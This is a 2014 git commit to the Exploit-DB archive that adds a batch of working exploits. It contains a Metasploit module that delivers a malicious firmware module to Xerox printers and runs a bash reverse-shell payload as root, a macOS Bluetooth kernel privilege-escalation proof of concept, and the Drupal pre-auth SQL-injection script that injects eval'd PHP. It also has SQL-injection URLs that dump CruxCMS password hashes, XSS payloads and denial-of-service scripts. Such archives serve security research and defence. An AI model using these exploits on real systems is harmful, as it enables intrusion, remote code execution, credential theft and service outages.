Updated 11_05_2014

This commit is contained in:
Offensive Security 2014-11-05 04:45:14 +00:00
parent 79ad0e1a38
commit 9fc5498a7e
9 changed files with 346 additions and 0 deletions

View file

@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45588/info
Sigma Portal is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

View file

@ -0,0 +1,98 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
'Description' => %{
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
commands under root priviages.
},
'Author' =>
[
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'References' =>
[
['BID', '52483'],
['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Mar 07 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9100)
], self.class)
end
def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
firmcode = '%%XRXbegin' + "\x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
begin
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
end

92
platforms/osx/dos/35153.c Executable file
View file

@ -0,0 +1,92 @@
/*
* pwn.c, by @rpaleari and @joystick
*
* This PoC exploits a missing sign check in
* IOBluetoothHCIUserClient::SimpleDispatchWL().
*
* Tested on Mac OS X Mavericks (10.9.4/10.9.5).
*
* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t payload() {
/* Your payload goes here. */
}
int main(void) {
/* Map our landing page (kernel will jump at tgt+7) */
vm_address_t tgt = 0x0000048800000000;
vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
vm_protect(mach_task_self(), tgt, 0x1000, 0,
VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
memset((void *)tgt, 0, 0x1000);
/* Prepare payload */
char *target = (char *)tgt;
/* mov rax, payload */
target[7] = 0x48;
target[8] = 0xb8;
*((uint64_t *)(&target[9])) = (uint64_t) payload;
/* jmp rax */
target[17] = 0xff;
target[18] = 0xe0;
printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
/* Find the vulnerable service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to the vulnerable service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
/* The first 8 bytes must be 0, so we don't have to handle following
parameters */
char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
/* Don't really matter for the exploit (ignored due to the 0s above) */
"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
"\x80\xff\xff\xff"
/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
need to be adjusted on other Mavericks versions. */
"\xa8\xb6\xf5\xff\x80\xff\xff\xff";
printf(" [+] Launching exploit!\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
/* Exec shell here after payload returns */
return IOServiceClose(port);
}

86
platforms/php/webapps/35150.php Executable file
View file

@ -0,0 +1,86 @@
<?php
// _____ __ __ _ _______
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
// and Stefan Esser <stefan.esser@sektioneins.de>
//·
include 'common.inc';
include 'password.inc';
// set values
$user_id = 0;
$user_name = '';
$code_inject = 'phpinfo();session_destroy();die("");';
$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$code|$file]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (!empty($code)) {
if (is_file($code)) {
$code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;

16
platforms/php/webapps/35155.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/45594/info
CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks.
CruxCMS 3.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users
http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users
http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif
http://www.example.com/cruxcms.3.0.0/manager/login.php?message=<script>alert(123);</script>
http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[]
http://www.example.com/cruxcms.3.0.0/search.php?search[]
http://www.example.com/cruxcms.3.0.0/manager/filetypes.php
http://www.example.com/cruxcms.3.0.0/styles/andreas01.php

11
platforms/php/webapps/35156.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45600/info
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
http://www.example.com/cpg.1.5.10/help.php?base=1
&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs
&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45600/info
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html>

19
platforms/windows/dos/35158.py Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45602/info
Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.
Mongoose 2.11 is vulnerable; other versions may also be affected.
import socket
host = 'localhost'
port = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET / HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Content-Length: -2147483648\r\n\r\n')